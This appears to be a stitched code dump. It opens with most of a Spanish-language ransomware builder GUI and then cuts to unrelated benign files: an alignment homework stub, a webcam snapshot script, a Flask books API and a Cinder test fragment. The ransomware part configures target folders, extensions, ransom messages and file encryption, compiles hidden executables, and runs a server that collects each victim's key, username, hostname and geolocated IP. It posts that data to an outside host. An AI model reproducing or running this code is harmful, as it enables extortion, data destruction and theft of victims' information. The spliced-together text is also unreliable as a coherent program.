Toplevel() self.serv.title(string = 'Capturador de Claves - Servidor') self.serv.configure(background = 'white') self.serv.resizable(0,0) self.serv.protocol("WM_DELETE_WINDOW", self.close_server_by_click) self.serv.bind("<Escape>", self.close_server) # Press ESC to close window # Input field data is being inserted in this dict self.serv.options = { 'host' : StringVar(), 'port' : IntVar(), 'remote' : StringVar(), 'local' : StringVar(), 'platform' : StringVar(), 'key' : StringVar(), 'mac' : IntVar(), 'linux' : IntVar(), 'other' : IntVar(), } # Canvas for image canvas = Canvas(self.serv, highlightthickness=0, height = 150, width = 500, background = 'white') canvas.grid(row=0, column=0, columnspan = 4) #photo = PIL.ImageTk.PhotoImage(PIL.Image.open(BytesIO(base64.b64decode(photo_code)))) if platform.system() == 'Linux': photo1 = Image.open(resource_path('images/windows.png')) resized = photo1.resize((100,100), Image.ANTIALIAS) photo1 = ImageTk.PhotoImage(resized) else: photo1 = PIL.Image.open(resource_path('images/windows.png')) resized = photo1.resize((100,100), PIL.Image.ANTIALIAS) photo1 = PIL.ImageTk.PhotoImage(resized) if platform.system() == 'Linux': photo2 = Image.open(resource_path('images/mac.png')) resized = photo2.resize((100,100), Image.ANTIALIAS) photo2 = ImageTk.PhotoImage(resized) else: photo2 = PIL.Image.open(resource_path('images/mac.png')) resized = photo2.resize((100,100), PIL.Image.ANTIALIAS) photo2 = PIL.ImageTk.PhotoImage(resized) if platform.system() == 'Linux': photo3 = Image.open(resource_path('images/linux.png')) resized = photo3.resize((100,100), Image.ANTIALIAS) photo3 = ImageTk.PhotoImage(resized) else: photo3 = PIL.Image.open(resource_path('images/linux.png')) resized = photo3.resize((100,100), PIL.Image.ANTIALIAS) photo3 = PIL.ImageTk.PhotoImage(resized) if platform.system() == 'Linux': photo4 = Image.open(resource_path('images/other.png')) resized = photo4.resize((100,100), Image.ANTIALIAS) photo4 = ImageTk.PhotoImage(resized) else: photo4 = PIL.Image.open(resource_path('images/other.png')) resized = photo4.resize((100,100), PIL.Image.ANTIALIAS) photo4 = PIL.ImageTk.PhotoImage(resized) label = Label(self.serv, image=photo1, background = 'white') label.image = photo1 # keep a reference! label.grid(row = 0, column = 0) label2 = Label(self.serv, image=photo2, background = 'white') label2.image = photo2 # keep a reference! label2.grid(row = 0, column = 1) label3 = Label(self.serv, image=photo3, background = 'white') label3.image = photo3 # keep a reference! label3.grid(row = 0, column = 2) label4 = Label(self.serv, image=photo4, background = 'white') label4.image = photo4 # keep a reference! label4.grid(row = 0, column = 3) self.serv.options['win'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold') self.serv.options['win'].grid(row = 1, column = 0, columnspan = 1) self.serv.options['mac'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold') self.serv.options['mac'].grid(row = 1, column = 1, columnspan = 1) self.serv.options['linux'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold') self.serv.options['linux'].grid(row = 1, column = 2, columnspan = 1) self.serv.options['other'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold') self.serv.options['other'].grid(row = 1, column = 3, columnspan = 1) # Log Frame result = LabelFrame(self.serv, text = 'Log', relief = GROOVE) result.grid(row = 2, column = 0, rowspan = 4, columnspan = 5) self.serv.options['log'] = Text(result, foreground="white", background="black", highlightcolor="white", highlightbackground="black", height = 35, width = 120) self.serv.options['log'].grid(row = 0, column = 1) scroll = Scrollbar(self.serv, command=self.serv.options['log'].yview) scroll.grid(row=1, column=5, sticky='nsew') self.serv.options['log']['yscrollcommand'] = scroll.set # Tags self.serv.options['log'].tag_configure('yellow', foreground='yellow') self.serv.options['log'].tag_configure('red', foreground='red') self.serv.options['log'].tag_configure('deeppink', foreground='deeppink') self.serv.options['log'].tag_configure('orange', foreground='orange') self.serv.options['log'].tag_configure('green', foreground='green') self.serv.options['log'].tag_configure('bold', font='bold') self.start_thread() def export_data(self): pass def compile(self): self.comp = Toplevel() self.comp.title(string = 'Compilar Payload') self.comp.configure(background = 'white') self.comp.resizable(0,0) self.comp.bind("<Escape>", self.close_compile) # Press ESC to close window if os.path.isfile('./payload.py'): self.options['payload_path'].set('./payload.py') if os.path.isfile('./decryptor.py'): self.options['decryptor_path'].set('./decryptor.py') msg = LabelFrame(self.comp, text = 'Message', relief = GROOVE) msg.grid(row = 0, column = 0, columnspan = 3, sticky = 'w') Label(msg, text = 'Parece que estas ejecutando %s.\nSolo puede compilar en el sistema operativo que se esta ejecutando.' % platform.system(), background = 'white', font='Helvetica 16').grid(row = 0, column = 0) os_frame = LabelFrame(self.comp, text = 'OS') os_frame.grid(row = 1, column = 0) win = Radiobutton(os_frame, text = 'Windows', variable = self.options['os'], value = 'windows') win.grid(row = 0, column = 0, sticky = 'w') mac = Radiobutton(os_frame, text = 'MacOS', variable = self.options['os'], value = 'mac') mac.grid(row = 1, column = 0, sticky = 'w') lin = Radiobutton(os_frame, text = 'Linux', variable = self.options['os'], value = 'linux') lin.grid(row = 2, column = 0, sticky = 'w') sett_frame = LabelFrame(self.comp, text = 'Opciones') sett_frame.grid(row = 1, column = 1, columnspan = 2) Entry(sett_frame, textvariable = self.options['icon_path'], width = 50).grid(row = 0, column = 0) set_ico = Button(sett_frame, text = "SELECCIONAR ICONO", command = self.select_icon, width = 15).grid(row = 0, column = 1) Entry(sett_frame, textvariable = self.options['payload_path'], width = 50).grid(row = 1, column = 0) set_payload = Button(sett_frame, text = "SELECCIONAR PAYLOAD", command = self.select_payload, width = 15).grid(row = 1, column = 1) Entry(sett_frame, textvariable = self.options['decryptor_path'], width = 50).grid(row = 2, column = 0) set_decryptor = Button(sett_frame, text = "SELECCIONAR DESCIFRADOR", command = self.select_decryptor, width = 15).grid(row = 2, column = 1) opt_frame = LabelFrame(self.comp, text = 'Finalizar') opt_frame.grid(row = 2, column = 0, columnspan = 2) finish = Button(opt_frame, text = "COMPILAR", command = self.compile_payload, width = 45).grid(row = 0, column = 0) if platform.system() == 'Windows': self.options['os'].set('windows') mac.config(state = DISABLED) lin.config(state = DISABLED) elif platform.system() == 'Darwin': self.options['os'].set('mac') win.config(state = DISABLED) lin.config(state = DISABLED) elif platform.system() == 'Linux': self.options['os'].set('linux') win.config(state = DISABLED) mac.config(state = DISABLED) def compile_payload(self): icon = False try: payload = open(self.options['payload_path'].get()).read() except FileNotFoundError: return messagebox.showerror('ERROR', 'File does not exist, check payload path!') if not self.options['icon_path'].get() == '': if not os.path.isfile(self.options['icon_path'].get()): return messagebox.showwarning('ERROR', 'Icon File Not Found!') else: icon = True if not os.path.isfile(self.options['payload_path'].get()): return messagebox.showwarning('ERROR', 'Payload Not Found!') try: if self.options['os'].get() == 'windows': py = 'pyinstaller.exe' else: py = 'pyinstaller' if not 'from tkinter.ttk import' in payload: tk = '' else: tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io' if not 'from Crypto import Random' in payload: crypto = '' else: crypto = '--hidden-import pycryptodome' if not 'import pyaes' in payload: pyaes = '' else: pyaes = '--hidden-import pyaes' if icon == True: os.system('%s -F -w -i %s %s %s %s %s' % (py, self.options['icon_path'].get(), tk, crypto, pyaes, self.options['payload_path'].get())) else: os.system('%s -F -w %s %s %s %s' % (py, tk, crypto, pyaes, self.options['payload_path'].get())) if os.path.isfile('./decryptor.py'): ask = messagebox.askyesno('Found decryptor!', 'Compilar Desencriptador ahora?') if ask == False: messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente') self.comp.destroy() elif ask == True: self.compile_decrypt() else: return messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente') except Exception as e: messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e) def compile_decrypt(self): try: decrypt = open(self.options['decryptor_path'].get()).read() except FileNotFoundError: return messagebox.showerror('ERROR', 'File does not exist, check decryptor path!') try: if self.options['os'].get() == 'windows': py = 'pyinstaller.exe' else: py = 'pyinstaller' if not 'from tkinter.ttk import' in decrypt: tk = '' else: tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io' if not 'from Crypto import Random' in decrypt: crypto = '' else: crypto = '--hidden-import pycryptodome' if not 'import pyaes' in decrypt: pyaes = '' else: pyaes = '--hidden-import pyaes' if not 'from pymsgbox': pymsg = '' else: pymsg = '--hidden-import pymsgbox' os.system('%s -F -w %s %s %s %s %s' % (py, tk, crypto, pyaes, pymsg, self.options['decryptor_path'].get())) messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente') self.comp.destroy() except Exception as e: messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e) def select_icon(self): self.options['icon_path'].set(askopenfilename(initialdir = "./", title = 'Select Icon...', filetypes = (('Icon Files', '*.ico'), ('All Files', '*.*')))) def select_payload(self): self.options['payload_path'].set(askopenfilename(initialdir = "./", title = 'Select Payload...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*')))) def select_decryptor(self): self.options['decryptor_path'].set(askopenfilename(initialdir = "./", title = 'Select Decryptor...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*')))) def generate(self): self.gen = Toplevel() self.gen.title(string = 'Generar Payload') self.gen.configure(background = 'white') self.gen.resizable(0,0) self.gen.bind("<Escape>", self.close_generate) # Press ESC to close window mode_frame = LabelFrame(self.gen, text = 'Modo') mode_frame.grid(row = 0, column = 0, sticky = 'nw') Radiobutton(mode_frame, text = 'GUI', variable = self.options['mode'], value = 1).grid(row = 0, column = 0, sticky = 'w') Radiobutton(mode_frame, text = 'Consola', variable = self.options['mode'], value = 2, command = self.check_settings).grid(row = 1, column = 0, sticky = 'w') Checkbutton(mode_frame, text = "Fullscreen", variable = self.options['full_screen_var'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 1, sticky = 'w') server_frame = LabelFrame(self.gen, text = 'Servidor Remoto') server_frame.grid(row = 0, column = 1, sticky = 'nw') Label(server_frame, text = 'Host:').grid(row = 0, column = 0, sticky = 'w') Entry(server_frame, textvariable = self.options['host'], width = 20).grid(row = 0, column = 1) Label(server_frame, text = 'Port:').grid(row = 1, column = 0, sticky = 'w') Entry(server_frame, textvariable = self.options['port'], width = 20).grid(row = 1, column = 1) enc_frame = LabelFrame(self.gen, text = 'Tipo de Encriptación') enc_frame.grid(row = 0, column = 2, sticky = 'w') Radiobutton(enc_frame, text = 'PyCrypto (Fast)', variable = self.options['type'], value = 'pycrypto').grid(row = 0, column = 0, sticky = 'w') Radiobutton(enc_frame, text = 'PyAES (Slow)', variable = self.options['type'], value = 'pyaes').grid(row = 1, column = 0, sticky = 'w') content_frame = LabelFrame(self.gen, text = 'Contenido') content_frame.grid(row = 1, column = 0, sticky = 'nw') set_dirs = Button(content_frame, text = 'Directorios', command = self.set_dirs, width = 25).grid(row = 0, column = 0) set_msg = Button(content_frame, text = 'Mensaje', command = self.set_msg, width = 25).grid(row = 1, column = 0) set_img = Button(content_frame, text = 'Imagen', command = self.set_img, width = 25).grid(row = 2, column = 0) set_ext = Button(content_frame, text = 'Extensiones', command = self.set_ext, width = 25).grid(row = 3, column = 0) options_frame = LabelFrame(self.gen, text = 'Opciones') options_frame.grid(row = 0, column = 3, sticky = 'nw') Checkbutton(options_frame, text = 'Demo', variable = self.options['demo'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 0, sticky = 'w') Checkbutton(options_frame, text = 'Debug', variable = self.options['debug'], onvalue = 1, offvalue = 0).grid(row = 1, column = 0, sticky = 'w') Checkbutton(options_frame, text = 'Admin', variable = self.options['runas'], onvalue = 1, offvalue = 0).grid(row = 2, column = 0, sticky = 'w') meth_frame = LabelFrame(self.gen, text = 'Método de Encriptación') meth_frame.grid(row = 1, column = 1, sticky = 'w') Radiobutton(meth_frame, text = 'Sobrescribir y Renombrar', variable = self.options['method'], value = 'override').grid(row = 0, column = 0, sticky = 'w') Radiobutton(meth_frame, text = 'Copiar y Eliminar', variable = self.options['method'], value = 'copy').grid(row = 1, column = 0, sticky = 'w') finish_frame = LabelFrame(self.gen, text = 'Finalizar') finish_frame.grid(row = 1, column = 2, columnspan = 1, sticky = 'w') generate = Button(finish_frame, text = "Generar", command = self.make_demon, width = 25).grid(row = 0, column = 0) def set_img(self): try: f = base64.b64encode(open(askopenfilename(initialdir = "./", title = 'Select Image...', filetypes = ([('Image Files', '*.png *.jpg')])), 'rb').read()).decode('utf-8') except FileNotFoundError: return self.options['img_base64'].set(f) def set_msg(self): self.message = Toplevel() self.message.title(string = 'Set Custom Message') self.message.configure(background = 'white') self.message.resizable(0,0) self.message.bind("<Escape>", self.close_set_msg) self.options['new_msg'] = Text(self.message, height = 25, width = 100) self.options['new_msg'].grid(row = 0, column = 0) save = Button(self.message, text = 'SAVE', command = self.change_msg, width = 50).grid(row = 1, column = 0) self.options['new_msg'].insert(END, self.options['msg'].get()) self.options['new_msg'].focus() def change_msg(self): self.options['msg'].set(self.options['new_msg'].get('1.0', END)) self.message.destroy() def set_ext(self): self.extentions = Toplevel() self.extentions.title(string = 'Set File Extentions') self.extentions.configure(background = 'white') self.extentions.resizable(0,0) self.extentions.bind("<Escape>", self.close_set_target_ext) self.options['new_target_ext'] = Text(self.extentions, height = 15, width = 25) self.options['new_target_ext'].grid(row = 0, column = 0) scrollb = Scrollbar(self.extentions, command=self.options['new_target_ext'].yview) scrollb.grid(row=0, column=1, sticky='nsew') self.options['new_target_ext']['yscrollcommand'] = scrollb.set save = Button(self.extentions, text = 'SAVE', command = self.change_target_ext, width = 15).grid(row = 1, column = 0) self.options['new_target_ext'].insert(END, self.options['target_ext'].get()) self.options['new_target_ext'].focus() def change_target_ext(self): self.options['target_ext'].set(self.options['new_target_ext'].get('1.0', END)) self.extentions.destroy() def set_dirs(self): self.dirs = Toplevel() self.dirs.title(string = 'Definir Directorios') self.dirs.configure(background = 'white') self.dirs.resizable(0,0) self.dirs.bind("<Escape>", self.close_set_target_dirs) Label(self.dirs, text = 'Root', background = 'white').grid(row = 0, column = 0, sticky = 'w') self.options['new_working_dir'] = Entry(self.dirs, width = 30) self.options['new_working_dir'].grid(row = 1, column = 0, sticky = 'n') Label(self.dirs, text = 'Directorios', background = 'white').grid(row = 2, column = 0, sticky = 'w') self.options['new_target_dirs'] = Text(self.dirs, height = 10, width = 40) self.options['new_target_dirs'].grid(row = 3, column = 0) save = Button(self.dirs, text = 'Guardar', command = self.change_target_dirs, width = 15).grid(row = 4, column = 0) self.options['new_working_dir'].insert(END, self.options['working_dir'].get()) self.options['new_target_dirs'].insert(END, self.options['target_dirs'].get()) self.options['new_working_dir'].focus() def change_target_dirs(self): self.options['working_dir'].set(self.options['new_working_dir'].get()) self.options['target_dirs'].set(self.options['new_target_dirs'].get('1.0', END)) self.dirs.destroy() def check_settings(self): if self.options['mode'].get() == 2: self.options['full_screen_var'].set(0) def make_demon(self): try: create_demon(self.options['host'].get(), self.options['port'].get(), self.options['full_screen_var'].get(), self.options['demo'].get(), self.options['type'].get(), self.options['method'].get(), self.options['msg'].get(), self.options['img_base64'].get(), self.options['mode'].get(), self.options['debug'].get(), self.options['target_ext'].get(), self.options['target_dirs'].get(), self.options['remove_payload'].get(), self.options['working_dir'].get(), self.options['runas'].get()) except Exception as e: messagebox.showwarning('ERROR', 'Failed to generate payload!\n\n%s' % e) return try: create_decrypt(self.options['type'].get()) messagebox.showinfo('SUCCESS', 'Payload y Descifrador generados exitosamente.') except Exception as e: messagebox.showwarning('ERROR', 'Failed to generate decryptor!\n\n%s' % e) self.gen.destroy() def decrypt_files(self): ask = confirm(text='Selecciona un Método de Desenciptación', buttons=['PyCrypto', 'PyAES']) if ask == "I don't know": messagebox.showinfo('Encryption type detection', 'Comming Soon!\n\nIf you really dont know, test it on one file first.') return if ask == 'Ghost': pass else: key = dec_key() key = key.encode('utf-8') if key == False: return p = dec_path() if p == False: return a = messagebox.askokcancel('ALERTA', 'Esta herramienta descifrará sus archivos con la clave dada.\n\nSin embargo, si su clave o método no es correcto, sus archivos (encriptados) serán dañados\n\n ¡Es posible que desee hacer una copia de seguridad!') if a == True: pass else: return try: counter = 0 for path, subdirs, files in os.walk(p): for name in files: if name.endswith(".DEMON"): if ask == 'PyCrypto': decrypt_file(os.path.join(path, name), key) os.remove(os.path.join(path, name)) print("[Decrypted] %s" % name) counter+=1 elif ask == 'PyAES': print("[Decrypting] %s" % name) decrypt_file_pyaes(os.path.join(path, name), key) os.remove(os.path.join(path, name)) counter+=1 elif ask == 'Ghost': rename_file(os.path.join(path, name)) print("[RENAMED] %s" % name) counter+=1 elif name == 'README.txt': os.remove(os.path.join(path, name)) print('[DELETED] %s/%s' % (path, name)) else: print("[Skipped] %s" % name) print("\n[DONE] Decrypted %i files" % counter) except KeyboardInterrupt: print("\nInterrupted!\n") sys.exit(0) except Exception as e: print("\n[ ERROR ] %s" % e) sys.exit(1) def start_thread(self): # Start server as thread thread = threading.Thread(target=self.start_server, daemon = True) thread.start() def start_server(self): host = self.options['host'].get() port = self.options['port'].get() save_keys = self.options['save_keys'].get() socket_list = [] self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.bind((host, port)) self.server_socket.listen(10) self.insert_banner() self.serv.options['log'].insert('1.0', "Servidor Iniciado en [%s] [%s]\nEsperando...\n" % (host, int(port)), 'deeppink') try: while True: sockfd, addr = self.server_socket.accept() try: while True: data = sockfd.recv(1024) if data: data = data.decode('UTF-8') ip = addr[0] local = data.split('$')[0] system = data.split('$')[1] key = data.split('$')[2].strip()[2:].strip()[:-1] user = data.split('$')[3] hostname = data.split('$')[4] if ip: lookup = self.get_ip_data(ip) con = lookup.split(',')[0] country = lookup.split(',')[1] region = lookup.split(',')[2] city = lookup.split(',')[3] isp = lookup.split(',')[4] zip = lookup.split(',')[5] lat = lookup.split(',')[6] lon = lookup.split(',')[7] result = ''' [Fecha] -> %s %s [Username] -> %s [OS] -> %s [Hostname] -> %s [Key] -> %s [IP Remota] -> %s [IP Local] -> %s ''' % (time.strftime('%d/%m/%Y'), time.strftime('%X'), user, system, hostname, key, ip, local) self.serv.options['log'].insert(END, result, 'yellow') self.serv.options['log'].see(END) if system == 'Windows': co = self.serv.options['win']['text'] + 1 self.serv.options['win']['text'] = co elif system == 'Darwin': co = self.serv.options['mac']['text'] + 1 self.serv.options['mac']['text'] = co elif system == 'Linux': co = self.serv.options['linux']['text'] + 1 self.serv.options['linux']['text'] = co else: co = self.serv.options['other']['text'] + 1 self.serv.options['other']['text'] = co #if save_keys == 1: payload = {'user' : self.options['username'].get(), 'pwd' : self.options['password'].get(), 'Occured': time.strftime('%d/%m/%Y') + ' ' + time.strftime('%X'), 'Username' : user, 'OS' : system, 'Hostname' : hostname, 'Key' : key, 'IP' : ip, 'LocalIP' : local, 'Continent' : con, 'Country' : country, 'Region' : region, 'City' : city , 'ISP' : isp, 'ZIP' : zip, 'lat' : lat, 'lon' : lon} r = requests.post('https://zeznzo.nl/post.py', data=payload) else: break except Exception as e: print(e) finally: sockfd.close() except Exception as e: pass self.server_socket.close() def close_server_by_click(self): self.server_socket.close() self.serv.destroy() def insert_banner(self): banner = ''' ______ ______ _____ __ __ _____ _____ _____ _____ | ___ \| ___ \| _ |\ \ / /| ___|/ __ \|_ _|| _ | | |_/ /| |_/ /| | | | \ V / | |__ | / \/ | | | | | | | __/ | / | | | | \ / | __| | | | | | | | | | | | |\ \ \ \_/ / | | | |___ | \__/\ | | \ \_/ / \_| \_| \_| \___/ \_/ \____/ \____/ \_/ \___/ ______ __ __ _____ _ _ _____ _ _ | ___ \\ \ / /|_ _|| | | || _ || \ | | | |_/ / \ V / | | | |_| || | | || \| | | __/ \ / | | | _ || | | || . ` | | | | | | | | | | |\ \_/ /| |\ | \_| \_/ \_/ \_| |_/ \___/ \_| \_/ ''' self.serv.options['log'].insert('1.0', banner + '\n', 'red') def get_ip_data(self, ip): url = 'http://ip-api.com/json/%s?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,query' % ip try: r = requests.get(url, timeout = 5) except Exception as e: con = 'Error - Fail' country = 'Error - Fail' region = 'Error - Fail' city = 'Error - Fail' isp = 'Error - Fail' zip = 'Error - Fail' lat = 'Error - Fail' lon = 'Error - Fail' return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon) data = r.json() if r.status_code == 200 and data['status'] == 'success': con = data['continent'] + ' (' + data['continentCode'] + ')' country = data['country'] + ' (' + data['countryCode'] + ')' region = data['regionName'] city = data['city'] isp = data['isp'].replace(',', '') zip = data['zip'] lat = data['lat'] lon = data['lon'] else: con = 'Error - Fail' country = 'Error - Fail' region = 'Error - Fail' city = 'Error - Fail' isp = 'Error - Fail' zip = 'Error - Fail' lat = 'Error - Fail' lon = 'Error - Fail' return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon) def close_profile(self, event): self.prof.destroy() def close_exploit(self, event): self.exp.destroy() def close_server(self, event): self.server_socket.close() self.serv.destroy() def close_compile(self, event): self.comp.destroy() def close_generate(self, event): self.gen.destroy() def close_set_msg(self, event): self.message.destroy() def close_set_target_ext(self, event): self.extentions.destroy() def close_set_target_dirs(self, event): self.dirs.destroy() def exit(self): sys.exit(0) def exit_event(self, event): exit(0) ventana = MainWindow() ventana.mainloop() ```
{ "source": "2020-Fall-UIUC-LING506/hw2", "score": 3 }
#### File: 2020-Fall-UIUC-LING506/hw2/align.py ```python import argparse from collections import defaultdict import sys from corpus import AlignmentScores, ParallelCorpus import signal import pathlib signal.signal(signal.SIGPIPE, signal.SIG_DFL) def parse_align_flags() -> argparse.Namespace: """Parse command line arguments""" parser = argparse.ArgumentParser(description='Calculate word alignments from a sentence-aligned parallel corpus') parser.add_argument("-f", "--f_file", type=str, default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.f", help="Path to sentence-aligned French side of the parallel corpus") parser.add_argument("-e", "--e_file", type=str, default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.e", help="Path to sentence-aligned English side of the parallel corpus") return parser.parse_args() def train(corpus: ParallelCorpus) -> AlignmentScores: # Initialize all alignment scores to zero alignment_score: AlignmentScores = defaultdict(float) # Your code to calculate word alignment scores goes here. # # You are expected to implement IBM Model 1 return alignment_score def print_alignments(corpus: ParallelCorpus, alignment_score: AlignmentScores): """Print alignments for each parallel sentence""" for parallel_sentence in corpus: for (i, f_word) in enumerate(parallel_sentence.f): for (j, e_word) in enumerate(parallel_sentence.e): # Your code goes here pass if __name__ == "__main__": # Parse command line arguments flags = parse_align_flags() # Construct parallel corpus from user-specified files parallel_corpus = ParallelCorpus(flags.f_file, flags.e_file, flags.num_sentences) # Calculate alignment scores using naive baseline algorithm baseline_alignment_scores: AlignmentScores = train(parallel_corpus) # Print alignments print_alignments(parallel_corpus, baseline_alignment_scores) ```
{ "source": "2020gupta/automation", "score": 3 }
#### File: 2020gupta/automation/take_snapshot.py ```python import cv2 def take_snapshot(): videoCaptureObject = cv2.VideoCapture(0) result = True while(result): ret,frame = videoCaptureObject.read() cv2.imwrite("NewPicture1.jpg",frame) result = False videoCaptureObject.release() cv2.destroyAllWindows() take_snapshot() ```
{ "source": "2020HackDiversity-Team12/cscl-api", "score": 3 }
#### File: cscl-api/src/main.py ```python import database import config import resources from flask import Flask, Blueprint, make_response, jsonify from werkzeug import exceptions as w_exceptions app = Flask(__name__) app.config.from_object(config.ProdConfig) app.register_blueprint(resources.books) database.init(app) ############################ # CORS # ############################ @app.after_request def add_headers(response): response.headers.add('Access-Control-Allow-Origin', '*') response.headers.add('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE') response.headers.add('Access-Control-Allow-Headers', 'x-requested-with,Content-Type') response.headers.add('Access-Control-Expose-Headers', 'Content-Type,Content-Length') return response ############################ # HTTP ERROR HANDLER # ############################ @app.errorhandler(w_exceptions.BadRequest) def bad_request(err): resp = jsonify({'status': err.code, 'text': 'bad request'}) return make_response(resp, err.code) @app.errorhandler(w_exceptions.NotFound) def not_found(err): resp = jsonify({'status': err.code, 'text': 'resource not found'}) return make_response(resp, err.code) @app.errorhandler(w_exceptions.MethodNotAllowed) def method_not_allowed(err): resp = jsonify({'status': err.code, 'text': 'method not allowed'}) return make_response(resp, err.code) if __name__ == "__main__": app.run() ``` #### File: cscl-api/src/resources.py ```python from flask import Blueprint, abort, jsonify, request, Response from database.models import Book import helpers import service import re books = Blueprint('books', __name__) HOST = 'https://api-cscl.herokuapp.com' # ###################### # BOOK ENDPOINTS # # ###################### @books.route('/api/search', methods=['GET']) def search(): """ Retrieve `SIZE_LIMIT` book records based on `q` param ----------------------------------------------------- Endpoints: GET /search?q={book_isbn_or_book_title} @QueryParams: q: (required) query @Response: books: return `SIZE_LIMIT` books that macth the query next: url to list the next `SIZE_LIMIT` book records """ try: q = request.args.get("q") regex = re.compile(f'.*{q}.*') book = Book.objects(title=regex).limit(30) return jsonify(book) except: return jsonify({"Error": "Bad query"}) @books.route('/api/books', methods=['GET']) def get_books(): """ Retrieve `SIZE_LIMIT` available book records ------------------------------------------- Endpoints: GET /books GET /books?lastid={last_book_id} @QueryParams: lastid: (optional) last book id to implement forward paging system @Response: books: return `SIZE_LIMIT` books next: url to list the next `SIZE_LIMIT` book records """ books = None book_lastid = None param_lastid = request.args.get("lastid") if(param_lastid): books = Book.objects(id__lt=param_lastid).order_by("-_id").limit(30) else: books = Book.objects().order_by("-_id").limit(30) try: book_lastid = books[len(books) - 1].id except Exception: pass next = f'{HOST}/api/books?lastid={book_lastid}' if book_lastid else None return jsonify({'books': books, 'next': next}) # Validate books that are created by client (Should we require the images??????) def ValidateBook(bookObject): if ("isbn" in bookObject and "title" in bookObject and "author" in bookObject and "publisher" in bookObject and "publication_year" in bookObject and "copies" in bookObject): return True else: return False @books.route('/api/books', methods=['POST']) def create_book(): """ Create a book record -------------------- Endpoints: POST /books @BodyParams: isbn: int title: str author: str publisher: str publication_year: str copies: int @Response: 200: return book ID """ entry = request.get_json() if ValidateBook(entry): newBook = { "isbn": entry["isbn"], "title": entry["title"], "author": entry["author"], "publisher": entry["publisher"], "publication_year": entry["publication_year"], "copies": entry["copies"], # "image_url_s": entry["image_url_s"], # "image_url_m": entry["image_url_m"], # "image_url_l": entry["image_url_l"] } newBook["available"] = newBook["copies"] Book(**newBook).save() return jsonify(newBook) else: return "Invalid Entry" @books.route('/api/books/<string:isbn>', methods=['GET']) def get_book(isbn): """ Retrieve a specific book record by it's ISBN --------------------------------------------- Endpoints: GET /books/isbn GET /books/isbn?act=(borrow|handback) @QueryParams: act: (optional) specific action on book Possible values: borrow, handback @Response: 200: return book record """ try: book = Book.objects.get(isbn=isbn) if request.args.get("act") == "borrow": if book["available"] > 0: book["available"] -= 1 else: return "This book is unavailable" elif request.args.get("act") == "handback": if book["available"] < book["copies"]: book["available"] += 1 else: return "You can't adda new copy" book.save() return jsonify(book) except: return "We don't carry this book" @books.route('/api/books/<string:isbn>', methods=['PUT']) def update_book(isbn): """ Update a specific book record by it's ISBN ------------------------------------------ Endpoints: PUT /books/isbn @BodyParams: isbn: int title: str author: str publisher: str publication_year: str copies: int available: int image_url_s: url image_url_m: url image_url_l: url @Response: 200: return book id """ entry = request.get_json() try: Book.objects.get(isbn=isbn).update(**entry) b = Book.objects.get(isbn=isbn) return jsonify(b) except: return jsonify({"Error": "Invalid Isbn or Invalid request"}) @books.route('/api/books/<string:isbn>', methods=['DELETE']) def remove_book(isbn): """ Update a specific book record by it's ISBN ------------------------------------------ Endpoints: DELETE /books/isbn @Response: 200: return book id """ try: book = Book.objects.get(isbn=isbn) isbn = book.isbn book.delete() return jsonify({'success': True, 'isbn': isbn}) except: return jsonify({"Error": "Invalid isbn"}) return "Book Has been deleted" @books.route('/api/seed/<int:n>', methods=['GET']) def seed_database(n): """ POPULATE DB WITH FAKE DATA ------------------------------------------ Endpoints: DELETE /seed/ @Response: 200: BOOKS CREATED """ message = None try: books = helpers.fake_book(int(n)) [service.create(book) for book in books] message = 'books created' except Exception: message = 'error while populating db' finally: return message ```
{ "source": "2020human/cinder", "score": 2 }
#### File: api/contrib/test_snapshot_actions.py ```python import mock from oslo_serialization import jsonutils import webob from cinder import context from cinder import db from cinder.objects import fields from cinder import test from cinder.tests.unit.api import fakes from cinder.tests.unit.api.v2 import fakes as v2_fakes from cinder.tests.unit import fake_constants as fake def fake_snapshot_get(context, snapshot_id): snapshot = v2_fakes.fake_snapshot(snapshot_id) if snapshot_id == fake.SNAPSHOT_ID: snapshot['status'] = fields.SnapshotStatus.CREATING else: snapshot['status'] = fields.SnapshotStatus.ERROR return snapshot class SnapshotActionsTest(test.TestCase): def setUp(self): super(SnapshotActionsTest, self).setUp() self.user_ctxt = context.RequestContext( fake.USER_ID, fake.PROJECT_ID, auth_token=True) @mock.patch('cinder.db.snapshot_update', autospec=True) @mock.patch('cinder.db.sqlalchemy.api._snapshot_get', side_effect=fake_snapshot_get) @mock.patch('cinder.db.snapshot_metadata_get', return_value=dict()) def test_update_snapshot_status(self, metadata_get, *args): body = {'os-update_snapshot_status': {'status': fields.SnapshotStatus.AVAILABLE}} req = webob.Request.blank('/v2/%s/snapshots/%s/action' % ( fake.PROJECT_ID, fake.SNAPSHOT_ID)) req.method = "POST" req.body = jsonutils.dump_as_bytes(body) req.headers["content-type"] = "application/json" res = req.get_response(fakes.wsgi_app( fake_auth_context=self.user_ctxt)) self.assertEqual(202, res.status_int) @mock.patch('cinder.db.sqlalchemy.api._snapshot_get', side_effect=fake_snapshot_get) @mock.patch('cinder.db.snapshot_metadata_get', return_value=dict()) def test_update_snapshot_status_invalid_status(self, metadata_get, *args): body = {'os-update_snapshot_status': {'status': 'in-use'}} req = 